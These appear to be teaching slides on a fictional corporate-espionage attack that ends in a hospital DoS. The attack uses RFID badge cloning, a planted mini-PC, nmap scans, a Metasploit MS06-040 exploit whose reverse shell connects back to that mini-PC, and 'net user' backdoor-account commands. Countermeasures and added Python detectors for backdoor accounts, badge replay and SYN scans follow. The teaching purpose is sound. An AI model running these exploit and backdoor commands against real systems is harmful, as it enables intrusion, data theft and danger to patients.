Corporate Espionage. Competitor of Alki Pharmaceuticals wants to get any technical information or...
Tel 283
Corporate Espionage
Background
Competitor of Alki Pharmaceuticals wants to get any technical information or research
Not have the hack traced back
Launch a disabling attack on the hospital across from Alki
◦ Critical services impacted, resulting in patient death
"Contractor" threatened the hacker's girlfriend
◦ Eight weeks allowed for the hack
Cost of corporate espionage
1999: $25 billion
◦ US Chamber of Commerce survey
2003: $89 billion from the Fortune 1000 companies
◦ PricewaterhouseCoopers and ASIS (American Society for Industrial Security) survey
2007: $100 billion plus
The Exploit
Reconnaissance
Physical access
Executing the hacks
DoS of hospital
Other "stuff"
Recon
Google search
◦ "intext:alki pharmaceuticals"
◦ Mentions the software vendor for Alki
Get info from the vendor's webpage
◦ Technical documentation: type of servers, ports
◦ Technical forum: an SA (system administrator) from Alki complaining about the software's restrictions
Physical recon
◦ Employees have RFID badges
www.sec.gov
◦ EDGAR search on publicly traded corporations
RFIDIOt
Python libraries for reading RFID devices
◦ Readers are available for purchase; depending on the standard, anywhere from $50 to $1000
◦ A writer can clone a valid RFID device
Phoenix met an official of Alki (the CFO)
◦ Got physically close enough to read her badge
◦ Now has access to every place the CFO is allowed
Social engineering
CFO takes the "prospective employee" (Phoenix) on a tour
◦ Observes which areas are carded
◦ Reads the cards of 15 employees, remembering the order in which the cards were read and the locations
◦ Will attempt to get a janitor's RFID card as well
Tools
Mini-PC with Vista
◦ VMware running a Knoppix Live CD ISO
◦ Integrated CDMA EV-DO cellular card
◦ Integrated 10/100 Ethernet NIC
Phoenix hopes to plant the mini-PC physically at Alki
◦ Get an IP via DHCP
◦ Connect to the Internet using the cellular card
Hotmail account traceable back to an Alki employee (the backup email account points back to the employee)
◦ Set up a GoToMyPC trial account with it
Physical intrusion set for when the janitors start night services
Intrusion
Phoenix takes the elevator (using the cloned CFO card) and enters the NOC room
◦ Uses the card to enter the NOC room
◦ No biometrics in place!
◦ Racks are neatly labeled, indicating which units are the R&D switches
Intrusion
Phoenix plugs a patch cable into an open port on the R&D switch
◦ Attaches the mini-PC to the switch
◦ Gets an IP via DHCP
◦ Boots up the Knoppix Live CD ISO under VMware; ifconfig reveals a supplied IP address of 10.0.0.6
◦ Going back to the host OS (Vista), he fires up the CDMA software; GoToMyPC is connected to the Internet
◦ Secretes the mini-PC and the power supply
◦ Takes a wireless access point, with an Alki inventory control tag, and leaves
Intrusion
On the train going home, Phoenix uses a CDMA connection on his laptop to verify the connection
◦ Brings up a web browser
◦ Utilizing the CFO's bogus account, logs into www.gotomypc.com
◦ Connects to the planted mini-PC in the Alki NOC room
Intrusion
On returning home, reconnects using GoToMyPC
◦ Goes to the VMware guest and in the shell starts up Nmap
nmap 10.0.0.0/24
◦ Shows the hosts and which ports are listening on these hosts
◦ 10.0.0.14 shows port 12345, which is the port the R&D server listens on (info developed through passive intel gathering)
nmap -A 10.0.0.14 -p 12345
◦ Attempts to uncover the OS
◦ Response is either XP SP2 or Windows Server 2003; probing a single port gives Nmap's OS fingerprint little to work with (it wants at least one open and one closed TCP port), hence the ambiguity
◦ Directory Services ports are open, so probably a Windows Server 2003 host
Intrusion
Recalling the forum complaints that the vendor's software is incapable of working with SP1 (so the server is likely still at the original release level, unpatched)
◦ www.microsoft.com/security: searches for the fixes such a system would be missing
◦ MS06-040, netapi32.dll, exploitable
Uses Metasploit to see if there's an available exploit
◦ use windows/smb/ms06_040_netapi
◦ Gets the Metasploit prompt: msf exploit(ms06_040_netapi) >
Metasploit
At the Metasploit prompt:
set PAYLOAD generic/shell_reverse_tcp
set RHOST 10.0.0.14
set LHOST 10.0.0.6
exploit
(LHOST is the Knoppix guest on the R&D switch, which is where the reverse shell connects back to.)
Phoenix now sees the following on his screen:
C:\WINDOWS\system32>
Phoenix has access to the target system!
Intrusion: Target Access
Phoenix is on the target system with Local System privilege
◦ Higher than Administrator!!! (MS06-040 is a flaw in the Server service, which runs as SYSTEM, so the shell inherits that account)
Once on the target system, Phoenix enters the following commands at the prompt:
net user linda alki$$ /ADD
◦ (Linda is the CFO)
net localgroup administrators linda /ADD
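The two net commands above leave a characteristic pair of Security events: an account is created and, seconds later, added to the local Administrators group, both performed by SYSTEM rather than by a named administrator. The following detector is an added example, not part of the original slides; it correlates those events over constructed sample log lines written in a simplified key=value form (real events are EVTX/XML and identify the member by SID). It accepts both the Windows 2000/XP/Server 2003 event IDs (624, 636) that the deck's Server 2003 target would log and the Vista/Server 2008 and later IDs (4720, 4732).

```python
"""Detect the backdoor-account sequence from the slides:
    net user linda alki$$ /ADD
    net localgroup administrators linda /ADD
by correlating Windows Security events.  Added example, not from the original
slides.  Event lines are constructed for the demo in a simplified 'key=value'
rendering; real events are EVTX/XML and name the member by SID.
"""
from datetime import datetime, timedelta

# "User account created" and "member added to a security-enabled local group":
# 624/636 on Windows 2000/XP/Server 2003, 4720/4732 on Vista/Server 2008+.
ACCOUNT_CREATED = {"624", "4720"}
ADDED_TO_LOCAL_GROUP = {"636", "4732"}
PRIVILEGED_GROUPS = {"Administrators", "Remote Desktop Users", "Backup Operators"}

# Constructed sample events (not real logs).
SAMPLE_EVENTS = """\
2008-03-14T02:11:05 EventID=624 SubjectUserName=SYSTEM TargetUserName=linda
2008-03-14T02:11:07 EventID=636 SubjectUserName=SYSTEM GroupName=Administrators MemberName=linda
2008-03-14T09:30:00 EventID=624 SubjectUserName=helpdesk TargetUserName=jsmith
2008-03-14T09:31:10 EventID=636 SubjectUserName=helpdesk GroupName=Users MemberName=jsmith
2008-03-15T11:00:00 EventID=4732 SubjectUserName=helpdesk GroupName=Administrators MemberName=svc_backup
"""


def parse_event(line):
    """Turn 'ISO-timestamp k=v k=v ...' into a dict with a datetime under 'time'."""
    ts, *fields = line.split()
    event = {"time": datetime.fromisoformat(ts)}
    for field in fields:
        key, _, value = field.partition("=")
        event[key] = value
    return event


def find_backdoor_accounts(text, window=timedelta(minutes=10)):
    """Return (account, subject, seconds) for every account that was created and
    then added to a privileged local group within `window`.

    The subject is who performed the change.  SYSTEM is the strong signal: an
    administrator typing the commands is logged under their own account, while a
    shell obtained from an exploited service (the Local System shell on the
    slides) performs both changes as SYSTEM.
    """
    created = {}  # account name -> creation event
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        if ev["EventID"] in ACCOUNT_CREATED:
            created[ev["TargetUserName"]] = ev
        elif ev["EventID"] in ADDED_TO_LOCAL_GROUP and ev["GroupName"] in PRIVILEGED_GROUPS:
            member = ev["MemberName"]
            origin = created.get(member)
            if origin is None:
                continue  # an existing account promoted: worth a look, but a different rule
            delta = ev["time"] - origin["time"]
            if timedelta(0) <= delta <= window:
                hits.append((member, ev["SubjectUserName"], int(delta.total_seconds())))
    return hits


if __name__ == "__main__":
    for account, subject, seconds in find_backdoor_accounts(SAMPLE_EVENTS):
        print(f"ALERT: {account} created and made privileged by {subject} within {seconds}s")
```

Run against the sample, the only hit is linda (created and promoted by SYSTEM two seconds apart); jsmith was added to Users, not a privileged group, and svc_backup was promoted without a creation event in the window. Auditing of account management must be enabled on the host for either event ID to exist at all.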
Intrusion: Hospital
Phoenix walks into the hospital and locates a room with available Ethernet plugs near the ER
◦ Gets an IP address
◦ Plugs in the stolen Alki wireless access point
◦ Resets the AP to factory defaults
◦ Configures it to support DHCP
◦ Verifies that he can connect via the AP
◦ Jacks the laptop into the Ethernet port
Runs nmap 10.10.10.0/24
◦ Response is 12 hosts, possibly all in the ER due to proximity
Maps out the OS on each host
◦ Results go to an alternate data stream (ADS) of a text file, which a plain dir listing does not show: nmap -A 10.10.10.0/24 > c:\OSDetect.txt:ads.txt
Intrusion: Hospital
The laptop was purchased with cash, with false information supplied, at a computer "superstore"
◦ Laptop loaded with viruses, a virus construction kit, recon tools, etc.
Using the laptop
◦ Phoenix logged into the Hotmail account (posing as the CFO from Alki), leaving the "remember me" settings on, making the investigators' job easier
◦ Sent/received emails asking for help on scanning, creating viruses and exploiting unpatched PCs
◦ Visited websites, leaving history on the PC
Verifies that the rogue access point functions from outside the hospital
Intrusion: Alki
R&D server partitions mapped out
◦ C: system partition
◦ D: data partition, shared by researchers
Over the network connection, a network share is established to an attached 1 TB drive
◦ Windows "Backup" of the target system's D: to the 1 TB drive
Physical entry back into the Alki NOC room
◦ Using the mini-PC and Remote Desktop: data partition deleted from D:, Windows system directory deleted from C:
DoS: Hospital
From the coffee shop next to the hospital, Phoenix uses Remote Desktop to connect to the mini-PC in the hospital and executes "wshwc.exe"
◦ Windows Scripting Host Worm Construction program
DoS: Hospital
WSHWC
◦ Names the worm Alkibot
◦ Payload option: Launch Denial of Service Attack
◦ Creates a separate worm for each of the 7 Unix (Solaris) hosts identified using nmap (a .vbs worm runs only under WSH on Windows, so the Solaris units are the DoS targets, not carriers)
◦ These .vbs files, along with 5 additional .vbs files for the other Windows boxes, are saved on the laptop
◦ A bat file is constructed to execute the .vbs files sequentially
◦ Executes the bat file
DoS: Hospital
News reports
◦ ER monitoring units (Solaris systems) were not able to send data out
    Resulted in cardiac arrest of 1 patient
    Incorrect medication prescribed to another patient
    Drips ran out for two other patients
◦ Alki executive (the CFO) arrested
◦ Alki stock value sharply down
◦ Alki competitor announced they were ahead of schedule in the release of their drug
Other options
Breach of confidentiality of employee information
Creation of backdoors, shell accounts
◦ Sell these
Access to Alki's banking information (Accounting dept.)
Stock manipulation
Summary
Detailed tech info on Alki's software uncovered by going to the vendor's site
RFID attack assisted in gaining physical access to Alki
◦ Bolstered by social engineering
Nmap scan identified the Alki R&D server
Microsoft.com used to uncover potential exploits for the server
Metasploit used to invoke the exploit
Windows Backup used to copy R&D data remotely using a network share
Deletion of data (getting rid of evidence, causing a diversion)
Hotmail account set up to implicate the CFO
Rogue AP set up in the hospital, DoS attack launched
Countermeasures
Physical security
◦ Single-factor access to restricted areas: implement multi-layer measures
◦ Note: Encryption of the RFID data means nothing if the badge is cloned, as the attacker does not need to "read" the data, just replay it; only a badge that answers a fresh challenge from the reader with a secret it never transmits (challenge-response) resists cloning
◦ Cameras / CCTV should be used
◦ The access device should not also be the ID card: the ID card is visible, the RFID device should be in a shielded carrier
◦ Disable open ports on a switch
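The note above is the crux of the RFID part of the story: the cloned CFO badge works because the reader only ever asks for a fixed answer. The simulation below is an added example, not from the original slides or from the RFIDIOt toolkit; it models badge and reader as Python objects, with invented UIDs, keys and enrolment tables. A static badge, whether it emits a plain UID or an "encrypted" blob, is replayed by a clone and admitted; a challenge-response badge keyed with a per-card secret passes as the genuine card but the clone, holding only one captured answer, is rejected on the next read.

```python
"""Why encrypting the data on a badge does not stop a cloned badge, and what
does.  Added example, not from the original slides; it models the badge/reader
exchange in software.  Keys, UIDs and the enrolment tables are invented.

A static badge answers every read with the same bytes; whether those bytes are
a plain UID or an 'encrypted' blob makes no difference to a writer that has
captured them.  A challenge-response badge answers a fresh reader nonce with an
HMAC keyed by a secret that never leaves the card, so a captured exchange is
useless on the next read.
"""
import hashlib
import hmac
import os

SYSTEM_KEY = b"hypothetical site-wide badge key"  # only used to 'encrypt' the static credential


def uid_bytes(uid):
    return uid.to_bytes(4, "big")


class StaticBadge:
    """Emits a fixed credential; 'encrypt' only changes which fixed bytes are emitted."""

    def __init__(self, uid, encrypt=False):
        plain = uid_bytes(uid)
        self.credential = (hmac.new(SYSTEM_KEY, plain, hashlib.sha256).digest()
                           if encrypt else plain)

    def respond(self, challenge):
        return self.credential  # challenge ignored: the answer never varies


class ChallengeBadge:
    """Holds a per-card secret and proves it without ever transmitting it."""

    def __init__(self, uid, secret):
        self.uid = uid
        self._secret = secret

    def respond(self, challenge):
        return hmac.new(self._secret, challenge + uid_bytes(self.uid), hashlib.sha256).digest()


class ClonedBadge:
    """What an attacker's writer produces: the bytes heard during one read."""

    def __init__(self, captured_response):
        self.captured = captured_response

    def respond(self, challenge):
        return self.captured


class StaticReader:
    def __init__(self, enrolled_credentials):
        self.enrolled = set(enrolled_credentials)

    def admit(self, badge):
        return badge.respond(b"") in self.enrolled


class ChallengeReader:
    def __init__(self, secrets_by_uid):
        self.secrets = secrets_by_uid  # hypothetical enrolment DB: uid -> per-card secret

    def admit(self, badge, uid):
        nonce = os.urandom(16)  # fresh for every read, so an old answer never matches
        expected = hmac.new(self.secrets[uid], nonce + uid_bytes(uid), hashlib.sha256).digest()
        return hmac.compare_digest(badge.respond(nonce), expected)


def eavesdrop(badge, reader_challenge):
    """Phoenix standing next to the CFO: records one response to one challenge."""
    return badge.respond(reader_challenge)


def run_scenarios():
    cfo_uid = 0x00010042
    results = {}
    # Static credential, plain and 'encrypted': both fall to a replayed clone.
    for encrypted in (False, True):
        real = StaticBadge(cfo_uid, encrypt=encrypted)
        reader = StaticReader([real.credential])
        clone = ClonedBadge(eavesdrop(real, b""))
        results[f"static_clone_admitted(encrypted={encrypted})"] = reader.admit(clone)
    # Challenge-response: the genuine card passes, the clone fails on the next nonce.
    secret = os.urandom(32)
    real = ChallengeBadge(cfo_uid, secret)
    reader = ChallengeReader({cfo_uid: secret})
    clone = ClonedBadge(eavesdrop(real, os.urandom(16)))  # captured during a legitimate read
    results["challenge_real_admitted"] = reader.admit(real, cfo_uid)
    results["challenge_clone_admitted"] = reader.admit(clone, cfo_uid)
    return results


if __name__ == "__main__":
    for name, admitted in run_scenarios().items():
        print(f"{name}: {'ADMITTED' if admitted else 'rejected'}")
```

The per-card secret is the design point: a system-wide key, as used for the "encrypted" static badge here, is still a static credential from the reader's point of view. Challenge-response also assumes the reader generates a genuinely fresh nonce per read; a reader that reuses nonces hands the attacker the same replay.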
Countermeasures
Scanning attack
◦ Turn off ICMP
◦ Turn on Windows Firewall
    Simple nmap scans would come back with no results (Nmap's default host discovery pings first and skips hosts that do not answer)
    Possible to get results, just with more complex scans (e.g. skipping host discovery with -Pn)
◦ Client IDS: Cisco Security Agent (CSA)
    Detects SYN stealth scans, for example
    Perhaps make it impossible to determine which host was the R&D server
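Blocking ICMP defeats only the ping sweep; a scan that skips host discovery still shows up on the wire as one source sending bare SYNs to many ports in a few seconds, and that is what a host or network IDS keys on. The detector below is an added example, not from the original slides or from CSA; it runs over constructed, iptables-style log lines (SRC= DST= PROTO= DPT= FLAGS=) in which the scanner sends no ICMP at all, and flags any source that hits at least ten distinct ports within a ten-second window. Normal clients in the sample reconnect to a couple of ports and stay below the threshold.

```python
"""SYN-scan detection over connection logs: the check a host IPS such as the CSA
mentioned on the slide performs, and what survives 'turn off ICMP'.  Added
example, not from the original slides.  The log lines are constructed for the
demo in an iptables-like 'SRC= DST= PROTO= DPT= FLAGS=' form.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) SRC=(?P<src>\S+) DST=(?P<dst>\S+) "
    r"PROTO=(?P<proto>\S+)(?: DPT=(?P<dpt>\d+))?(?: FLAGS=(?P<flags>\S+))?"
)


def build_sample_log():
    """Constructed traffic: one legitimate client, one port scanner (10.10.10.77)."""
    lines = []
    # Legitimate ER workstation: repeated web and SMB connections to one server.
    for sec, port in enumerate([80, 80, 445, 80, 445, 80]):
        lines.append(f"2008-03-14 22:00:{sec:02d} SRC=10.10.10.20 DST=10.10.10.14 PROTO=TCP DPT={port} FLAGS=S")
        lines.append(f"2008-03-14 22:00:{sec:02d} SRC=10.10.10.20 DST=10.10.10.14 PROTO=TCP DPT={port} FLAGS=A")
    # Scanner: bare SYNs to 14 ports of one host inside two seconds, no ICMP (as with nmap -Pn).
    scan_ports = [21, 22, 23, 25, 53, 80, 110, 135, 139, 443, 445, 3389, 5900, 12345]
    for i, port in enumerate(scan_ports):
        lines.append(f"2008-03-14 22:01:{i // 7:02d} SRC=10.10.10.77 DST=10.10.10.14 PROTO=TCP DPT={port} FLAGS=S")
    return "\n".join(lines)


def detect_syn_scans(text, window=timedelta(seconds=10), min_ports=10):
    """Return [(src, distinct_targets, first_seen)] for sources that sent bare SYNs
    to at least `min_ports` distinct (dst, port) pairs within `window`."""
    syns = defaultdict(list)  # src -> [(time, dst, port)]
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        d = m.groupdict()
        # Only a SYN without ACK is a new connection attempt; SYN/ACK and ACK belong
        # to established flows, and a half-open (-sS) scan never sends the final ACK.
        if d["proto"] != "TCP" or d["flags"] != "S" or d["dpt"] is None:
            continue
        when = datetime.strptime(d["ts"], "%Y-%m-%d %H:%M:%S")
        syns[d["src"]].append((when, d["dst"], int(d["dpt"])))
    alerts = []
    for src, events in syns.items():
        events.sort()
        for i, (start, _, _) in enumerate(events):
            targets = set()
            for t, dst, port in events[i:]:
                if t - start > window:
                    break
                targets.add((dst, port))
            if len(targets) >= min_ports:
                alerts.append((src, len(targets), start.isoformat()))
                break  # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for src, n, when in detect_syn_scans(build_sample_log()):
        print(f"ALERT: {src} probed {n} distinct ports starting {when} (SYN scan)")
```

Threshold and window are the tuning knobs: a slow scan (Nmap's -T0/-T1 timing) spreads its SYNs over minutes and slips under a ten-second window, which is why real sensors also keep longer-lived per-source counters.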
Countermeasures
Social engineering
◦ Training!
◦ Policies
◦ Testing of policies
OS attacks
◦ Patching
◦ Pressure the vendor to fix the application to work with a later, patched release of the OS
◦ Consider another software solution (dump the vendor)
Data theft
◦ Encryption